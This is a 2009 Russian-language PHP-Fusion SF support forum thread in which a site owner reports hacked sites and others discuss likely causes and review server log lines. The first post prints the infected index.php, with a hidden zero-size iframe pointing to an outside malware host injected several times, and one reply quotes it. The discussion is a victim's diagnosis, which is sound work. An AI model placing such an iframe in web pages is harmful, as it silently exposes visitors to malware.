Регистрация    Забыли пароль?        Правила форума    FAQ (читать перед созданием новой темы)
Имя   Пароль  запомнить
  
Просмотр темы
Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Разное | Флейм
# 1 Тема: Ломают сайты!!
Djooood
Пользователь

Avatar пользователя

Мой статус

Местный

Сообщений: 12
Зарегистрирован: 18 Февраля 2008, 01:21:22
Сказали спасибо 1 раз
Статус: offline
ICQ статус 455103816
Опубликовано 27 Января 2009, 05:19:30
Кто нибудь сталкивался с таким ломают сайты на phpfusion

изменяют index.php


<?php
<iframe src="http://wuorz.cn/kz7i1/fi24/" width="0" height="0" frameborder="0"></iframe>
/*---------------------------------------------------+
| PHP-Fusion 6 Content Management System
+----------------------------------------------------+
| Copyright © 2002 - 2006 Nick Jones
| http://www.php-fusion.co.uk/
+----------------------------------------------------+
| Released under the terms & conditions of v2 of the
| GNU General Public License. For details refer to
| the included gpl.txt file or visit http://gnu.org
+----------------------------------------------------+
| Modified by PHP-Fusion SF Group
| Copyright © 2007 by SF
| http://www.rus-phpfusion.com/
+----------------------------------------------------*/
<? include ("subnext.php");?>
if (file_exists('config.php') || @filesize('config.php')>0)
{
require_once "maincore.php";
include("err.php");

if ($settings['opening_page'] == "news.php") {
$settings['opening_page'] = (strrchr(FUSION_SELF,"/") == "index.php" ? "index.php" : "");
include "news.php";
}else{
redirect($settings['opening_page']);
}
}
else
{
header ('Location:setup.php');
}
?>

<? include ("subnext.php");?>

<iframe src="http://wuorz.cn/kz7i1/fi24/" width="0" height="0" frameborder="0"></iframe>



внедряют код
<iframe src="http://wuorz.cn/kz7i1/fi24/" width="0" height="0" frameborder="0"></iframe>



причём на этом сайте вирус!!!

версия была v6.01.16.4
сломали у меня лично 3 сайта
и у организации 1.
Кто знает какисм образом это могло произойти?
Анализ логов веб сервера ничегоне показал...
Добавляю навсякий случай лог сервера.(Мож кто что увидит)
85.173.88.190 - это я
Прикрепленные файлы
Для просмотра вложения зарегистрируйтесь


[Изменил(а) Djooood, 27 Января 2009, 05:20:28]

--------------------
Блог города Аксай

http://aksay-now.ru/
^ наверх ^ 455103816 http://aksay-now.ru/
# 2  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 27 Января 2009, 05:57:36
что Я тебе могу на это сказать... ругать уже устал... писать в чем проблема тоже... в поиск посылать вас бесполезно... вот что делать?


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
1 пользователь сказал спасибо Вам: Djooood
# 3  
LioN
Пользователь

Avatar пользователя

Админ

Завсегдатый

Сообщений: 52
Откуда: Россия\ Воронеж
Зарегистрирован: 04 Декабря 2008, 19:52:51
Сказали спасибо 2 раз
Статус: offline
ICQ статус 394107181
Опубликовано 28 Января 2009, 16:25:38
т.е они знают ошибки фъюжина ? или как то через бд?
 
^ наверх ^ 394107181
1 пользователь сказал спасибо Вам: Djooood
# 4  
dr56
SF Team

Avatar пользователя



SF Support Team

Любитель Fusion

Сообщений: 374
Зарегистрирован: 29 Августа 2008, 15:35:03
Сказали спасибо 25 раз
Статус: offline
Опубликовано 28 Января 2009, 21:15:47
читайте новости
 
^ наверх ^
1 пользователь сказал спасибо Вам: Djooood
# 5  
steelcat
Пользователь

Avatar пользователя



новичек

Сообщений: 5
Зарегистрирован: 01 Марта 2009, 21:10:47
Сказали спасибо 1 раз
Статус: offline
Опубликовано 01 Марта 2009, 21:15:28
Djooood написал:
Кто нибудь сталкивался с таким ломают сайты на phpfusion

изменяют index.php


[code]<?php
<iframe src="http://wuorz.cn/kz7i1/fi24/" width="0" height="0" frameborder="0"></iframe>


Друг, ломанули сначала комп, с которого на ftp есть доступ и пароль сохранен скорее всего. А бороться надо прежде всего с вирусами на своем компе. Данная зараза может в виде autorun распространяться на флешках.
 
^ наверх ^
1 пользователь сказал спасибо Вам: Djooood
# 6  
yury
Пользователь

Avatar пользователя

Магистр Дизайна и Верстки

Почетный SF

Сообщений: 1201
Зарегистрирован: 11 Января 2008, 15:57:19
Сказали спасибо 37 раз
Статус: offline
ICQ статус 371635405
Опубликовано 02 Марта 2009, 00:05:00
во первых следите за обновлениями, раз выбрали движок. Во вторых чаще ломают забросив файл шел и через него управляют файлами, можно сломать через соседний аккуант, сломать сам сервак, может твои друзья прикалываются, если знают пароль...
Выбирай вариант...


--------------------
Нужен сайт или красивый оригинальный дизайн?
Только лучший и оригинальный дизайн для php-fusion 6, 7, SF!
www.artcell.ru-правильный выбор!!!
^ наверх ^ 371635405 www.artcell.ru
1 пользователь сказал спасибо Вам: Djooood
# 7  
Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 13:15:07
Сказали спасибо 353 раз
Статус: offline
Опубликовано 02 Марта 2009, 17:54:54
При нормальных правах доступа можно ли шелом поправить файл?


--------------------
Retired
^ наверх ^
1 пользователь сказал спасибо Вам: Djooood
# 8  
cmGz
Пользователь

Avatar пользователя




Местный

Сообщений: 13
Зарегистрирован: 21 Апреля 2008, 06:09:01
Сказали спасибо 2 раз
Статус: offline
Опубликовано 20 Апреля 2009, 04:44:45
Да ломают, такая-же фтигня добавляют iframe, в некоторых файлах при попытки скачать на комп обнаружены вирусы
 
^ наверх ^
# 9  
Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 13:15:07
Сказали спасибо 353 раз
Статус: offline
Опубликовано 20 Апреля 2009, 08:19:10
cmGz логи можешь предоставить для разбора?

Реально я вижу - одни крики что кого то как то ломают, а что бы что то изменить - даже логи никто не посмотрит.


--------------------
Retired
^ наверх ^
1 пользователь сказал спасибо Вам: Djooood
# 10  
Djooood
Пользователь

Avatar пользователя

Мой статус

Местный

Сообщений: 12
Зарегистрирован: 18 Февраля 2008, 01:21:22
Сказали спасибо 1 раз
Статус: offline
ICQ статус 455103816
Опубликовано 20 Апреля 2009, 12:15:50
Psc написал:
cmGz логи можешь предоставить для разбора?

Реально я вижу - одни крики что кого то как то ломают, а что бы что то изменить - даже логи никто не посмотрит.


логи в первом посте есть


--------------------
Блог города Аксай

http://aksay-now.ru/
^ наверх ^ 455103816 http://aksay-now.ru/
# 11  
Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 13:15:07
Сказали спасибо 353 раз
Статус: offline
Опубликовано 20 Апреля 2009, 13:28:27
Djooood твои логи чистые. Это точно ТЕ логи?

В них есть только: перебор форумов, несколько отправок сообщений на ид=1 (XSS?) все неудачные (404) + попытка надыбать статистику.

так же несколько странных вещей:
69.80.244.163 - - [17/Dec/2008:14:54:21 +0300] "GET /%26 HTTP/1.0" 404 139 - символ & возможно случайный.

79.172.68.92 - - [19/Dec/2008:12:49:50 +0300] "GET /register.php+%5BPLM=0%5D%5BR%5D+GET+http://businclub.ru/register.php+%5B0,24318,544%5D+-%3E+%5BR%5D+POST+http://businclub.ru/register.php+%5B0,0,1253
6%5D HTTP/1.0" 404 139 - аяксовый мод регистрации?

67.228.111.202 - - [24/Dec/2008:06:59:18 +0300] "GET /?id=1768&img=bekijk HTTP/1.0" 200 42003 - параноидальная склонность к слову bekijk + неверная ссылка (особо неверная)

81.19.66.84 - - [08/Jan/2009:13:41:55 +0300] "GET /infusions/stats_info_panel/index.php?img=bekijk&id=632 HTTP/1.0" 200 13241 - оно же

Рекомендую поставить защитный плаг, либо поинтересоваться может это хостинг такой...


[Изменил(а) Psc, 20 Апреля 2009, 13:29:07]

--------------------
Retired
^ наверх ^
Перейти на форум:


105,453,868 уникальных посетителей
сейчас: 22 Ноября 2024, 04:06:17
Генерация страницы: 0.56 сек.

Original size:35 кб.
GZipped size: 8 кб.
Compression:77%